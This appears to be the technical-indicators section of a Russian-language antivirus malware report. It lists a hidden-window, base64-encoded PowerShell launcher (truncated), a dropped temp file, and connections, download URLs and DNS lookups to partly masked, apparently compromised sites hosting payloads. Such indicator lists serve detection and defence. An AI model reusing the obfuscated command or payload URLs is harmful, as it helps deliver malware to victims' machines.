Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAG4AeQB3AHIAeQBhAD0AKAAnAEIAbwAnACsAJwBsADEANQBnACcAKwAnAGUAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAHYAOgBUAEUAbQBwAFwATwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
- %TEMP%\839862.cvr
- 'gu###hr24.de':80
- 'za###life.com':80
- 'za###life.com':443
- 'mi###-seite.de':80
- 'br######acricketleague.com':80
- 'br######acricketleague.com':443
- http://gu###hr24.de/2015-11-09/arnf/
- http://za###life.com/wp-includes/w2jz15807/
- http://mi###-seite.de/bigil/VNgmf9392/
- http://br######acricketleague.com/wp-admin/XgE3ss97089/
- 'za###life.com':443
- 'br######acricketleague.com':443
- DNS ASK gu###hr24.de
- DNS ASK za###life.com
- DNS ASK mi###-seite.de
- DNS ASK gr###lms.com
- DNS ASK br######acricketleague.com
- DNS ASK be####phukhoa.info
- DNS ASK bl##.###adiworldtech.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAG4AeQB3AHIAeQBhAD0AKAAnAEIAbwAnACsAJwBsADEANQBnACcAKwAnAGUAJwApADsAJgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAHYAOgBUAEUAbQBwAFwATwBmAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)